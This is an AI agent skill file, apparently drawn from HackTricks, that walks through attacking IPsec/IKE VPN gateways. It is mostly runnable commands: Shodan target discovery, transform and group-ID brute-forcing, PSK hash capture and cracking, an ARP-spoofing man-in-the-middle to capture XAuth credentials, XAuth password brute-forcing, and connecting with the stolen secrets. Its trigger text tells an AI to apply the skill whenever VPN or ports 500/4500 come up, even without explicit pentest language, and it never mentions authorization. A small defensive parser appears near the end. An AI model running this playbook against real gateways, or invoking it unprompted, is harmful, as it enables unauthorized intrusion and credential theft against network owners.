Hacktricks-skills ipsec-ike-vpn-pentesting

Pentest IPsec/IKE VPN services on UDP ports 500 and 4500. Use this skill whenever the user mentions VPN pentesting, IPsec testing, IKE vulnerability assessment, or needs to enumerate and exploit IPsec/IKE VPN gateways. Trigger for any task involving VPN discovery, transformation enumeration, PSK cracking, XAuth attacks, or IKEv2 exploitation. Don't wait for explicit "pentest" language - if they mention VPN, IPsec, IKE, or port 500/4500, this skill applies.

Install

Source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/ipsec-ike-vpn-pentesting/SKILL.MD

Source content

IPsec/IKE VPN Pentesting

A comprehensive skill for pentesting IPsec/IKE VPN services. This skill guides you through discovery, enumeration, and exploitation of IPsec/IKE VPN gateways.

Quick Start

# Basic discovery
nmap -sU -p 500,4500 <target>

# Find valid transformations
ike-scan -M <target>

# Fingerprint vendor
ike-scan -M --showbackoff <target>

Phase 1: Service Discovery

Initial Reconnaissance

Start by confirming the IPsec service is running:

# UDP scan for ISAKMP (port 500) and NAT-T (port 4500)
nmap -sU -p 500,4500 <target>

# Check for IKE version
nmap -sU -p 500 --script ike-version <target>

Expected output:

PORT    STATE SERVICE
500/udp open  isakmp
4500/udp open  ipsec-nat-t

Shodan Queries for Target Discovery

# Find exposed IPsec gateways
shodan search "port:500 IKE"
shodan search "udp port:500,4500"
shodan search "udp port:500,4500 WatchGuard"

Phase 2: Find Valid Transformations

A transformation is a combination of encryption, hash, authentication, and DH group parameters. You need to find at least one valid transformation before proceeding.

Basic Transformation Discovery

# Main mode scan (default)
ike-scan -M <target>

# Aggressive mode scan
ike-scan -A <target>

Interpreting results:

  • 1 returned handshake; 0 returned notify
    - Valid transform found, proceed
  • 0 returned handshake; 1 returned notify
    - No valid transforms, try brute-forcing
  • 0 returned handshake; 0 returned notify
    - Not an IPsec gateway

Brute-Force Transformations

If no valid transform is found, generate and test all combinations:

# Generate transformation dictionary
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do
  for HASH in 1 2 3 4 5 6; do
    for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do
      for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do
        echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt
      done
    done
  done
done

# Test each transformation (prints only the lines that produced a handshake)
while read -r line; do
  (echo "Testing: $line" && sudo ike-scan -M "$line" <target>) |
  grep -B14 "1 returned handshake" |
  grep "Testing:"
done < ike-dict.txt

Alternative Tools

# Using iker.py
git clone https://github.com/isaudits/scripts.git
cd scripts && python iker.py <target>

# Using ikeforce
git clone https://github.com/SpiderLabs/ikeforce.git
cd ikeforce && pip install 'pyopenssl==17.2.0'
./ikeforce.py <target>

Phase 3: Vendor Fingerprinting

Using ike-scan Backoff Analysis

# Analyze timing patterns to identify vendor
ike-scan -M --showbackoff <target>

Example output:

Implementation guess: Cisco VPN Concentrator

WatchGuard Vendor ID Fingerprinting

WatchGuard Fireware OS encodes version info in Vendor ID payloads:

# Extract base64 from VID payload and decode
echo 'Vk49MTIuMTEuMyBCTj03MTk4OTQ=' | base64 -d
# Output: VN=12.11.3 BN=719894

Phase 4: Find Valid Group ID

You need a valid group ID (username) to capture the PSK hash. This requires aggressive mode support.

Test if Hash Capture is Possible

# Try with a bogus ID - if the gateway returns no hash for it, valid IDs can be told apart by brute-force
ike-scan -P -M -A -n fakeID <target>

Brute-Force Group IDs

# Using ike-scan with wordlist
while read -r line; do
  (echo "Found ID: $line" && sudo ike-scan -M -A -n "$line" <target>) |
  grep -B14 "1 returned handshake" |
  grep "Found ID:"
done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Using ikeforce for ID Discovery

# ikeforce uses multiple detection methods
./ikeforce.py <target> -e -w ./wordlists/groupnames.dic

ikeforce detection methods:

  1. Dead Peer Detection (DPD) response (Cisco-specific)
  2. Response packet count differences
  3. INVALID-ID-INFORMATION error messages
  4. Any response vs no response

Sniffing IDs from Live Traffic

If you can position yourself on the network:

# Capture aggressive mode packets (ID sent in clear)
tcpdump -i <interface> -s 0 -w ipsec.pcap udp port 500

Phase 5: Capture and Crack PSK Hash

Capture the Hash

# Requires: valid transform + valid ID + aggressive mode
ike-scan -M -A -n <valid_id> --pskcrack=hash.txt <target>

Crack the Hash

# Using psk-crack
psk-crack -d <wordlist> hash.txt

# Using John the Ripper
# First convert format
python ikescan2john.py hash.txt > john_hash.txt
john --wordlist=<wordlist> john_hash.txt

# Using Hashcat (mode 2500 is WPA, not IKE: use 5300 for IKE-PSK MD5, 5400 for IKE-PSK SHA1,
# matching the Hash algorithm of the transform that was negotiated)
hashcat -m 5300 hash.txt <wordlist>

Phase 6: XAuth Attacks

Credential Capture with fiked

# Setup MITM to capture XAuth credentials
# Requires: ARP spoofing to redirect IKE traffic
fiked -g <target_ip> -k testgroup:secretkey -l output.txt -d

Brute-Force XAuth Credentials

# Requires: valid group ID + cracked PSK
./ikeforce.py <target> -b -i <group_id> -u <username> -k <cracked_psk> -w <passwords.txt> [-s 1]

Phase 7: Establish VPN Connection

Using VPNC (Kali Linux)

# Create VPN profile
cat > /etc/vpnc/samplevpn.conf << EOF
IPSec gateway <VPN_GATEWAY_IP>
IPSec ID <VPN_CONNECTION_ID>
IPSec secret <VPN_GROUP_SECRET>
IKE Authmode psk
Xauth username <VPN_USERNAME>
Xauth password <VPN_PASSWORD>
EOF

# Connect
vpnc samplevpn

# Verify tunnel
ifconfig tun0

IKEv2 Exploitation Notes

Pre-Authentication Vulnerabilities

Modern IKEv2 implementations may have parsing bugs in IDi/CERT payloads:

Exploitation flow:

  1. Send valid IKE_SA_INIT to negotiate transforms
  2. Send IKE_SA_AUTH with malicious IDi payload
  3. Trigger buffer overflow or memory corruption
  4. Build ROP chain if mitigations are incomplete

Common IKEv2 Transforms

WatchGuard Fireware OS 12.11.3 examples:

  • SHA2-256–AES(256-bit) with DH Group 14
  • SHA1–AES(256-bit) with DH Group 5
  • SHA1–AES(256-bit) with DH Group 2
  • SHA1–3DES with DH Group 2

Practical Tips

  • Target both UDP/500 and UDP/4500 (NAT-T)
  • Increase UDP receive buffers for scanners
  • Use Vendor IDs to fingerprint vulnerable versions first
  • CVE-2025-9242: WatchGuard Fireware OS IKEv2 out-of-bounds write

Security Considerations

Weak DH Groups

DH Groups 1 and 2 are considered weak; flag them in the report if the gateway accepts them:

  • DH Group 1: 768-bit MODP
  • DH Group 2: 1024-bit MODP

Nation-state actors can break these in real-time using pre-computation.

Authentication Types

  • PSK (Pre-Shared Key): Most common, vulnerable to brute-force
  • Certificates: More secure, harder to exploit
  • XAuth: Additional user authentication layer
  • EAP (IKEv2): Modern replacement for XAuth
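As an added example (not part of the HackTricks skill or of ike-scan), the Python below parses an `ike-scan -M` handshake, maps the closing handshake/notify counters onto the three outcomes listed in Phase 2, and flags the weak or legacy parameters named in this section; the sample output is constructed, with a placeholder address and responder cookie.

```python
import re

# Constructed sample of `ike-scan -M` output (not captured from a real host);
# the address and responder cookie are placeholders.
SAMPLE_OUTPUT = """192.0.2.10\tAggressive Mode Handshake returned
\tHDR=(CKY-R=0000000000000000)
\tSA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tVID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.093 seconds (10.75 hosts/sec).  1 returned handshake; 0 returned notify
"""

# Policy mirroring the page: DH groups 1/2 are weak, DES/MD5 are broken,
# 3DES/SHA1 are legacy, and PSK in aggressive mode exposes a crackable hash.
WEAK = {"Enc": {"DES"}, "Hash": {"MD5"}, "Group": {"1", "2"}}
LEGACY = {"Enc": {"3DES"}, "Hash": {"SHA1"}}

def classify_summary(output):
    """Map ike-scan's closing counters onto the three outcomes from Phase 2."""
    m = re.search(r"(\d+) returned handshake; (\d+) returned notify", output)
    if not m:
        return "unknown"
    handshake, notify = int(m.group(1)), int(m.group(2))
    if handshake:
        return "valid transform"
    return "no valid transform" if notify else "not an IPsec gateway"

def parse_sa(output):
    """Return the key=value pairs of the first SA=(...) payload; Group keeps only its number."""
    m = re.search(r"SA=\((.*?)\)", output)
    sa = dict(kv.split("=", 1) for kv in m.group(1).split()) if m else {}
    if "Group" in sa:
        sa["Group"] = sa["Group"].split(":", 1)[0]  # "2:modp1024" -> "2"
    return sa

def audit(output):
    """List the weak or legacy negotiated parameters a report should flag."""
    sa = parse_sa(output)
    findings = []
    for key, value in sa.items():
        if value in WEAK.get(key, ()):
            findings.append(f"weak {key}={value}")
        elif value in LEGACY.get(key, ()):
            findings.append(f"legacy {key}={value}")
    if sa.get("Auth") == "PSK" and "Aggressive Mode Handshake" in output:
        findings.append("PSK hash exposed by aggressive mode")
    return findings
```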

Reference Tools

Tool        Purpose                                    Installation
ike-scan    Transformation discovery, ID brute-force   apt install ike-scan
ikeforce    ID brute-force, XAuth attacks              git clone https://github.com/SpiderLabs/ikeforce
iker.py     Alternative ID brute-force                 git clone https://github.com/isaudits/scripts
fiked       XAuth credential capture                   apt install fiked
vpnc        VPN client connection                      apt install vpnc
psk-crack   PSK hash cracking                          apt install ike-scan (psk-crack ships with it)

Wordlists

  • /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
  • https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic
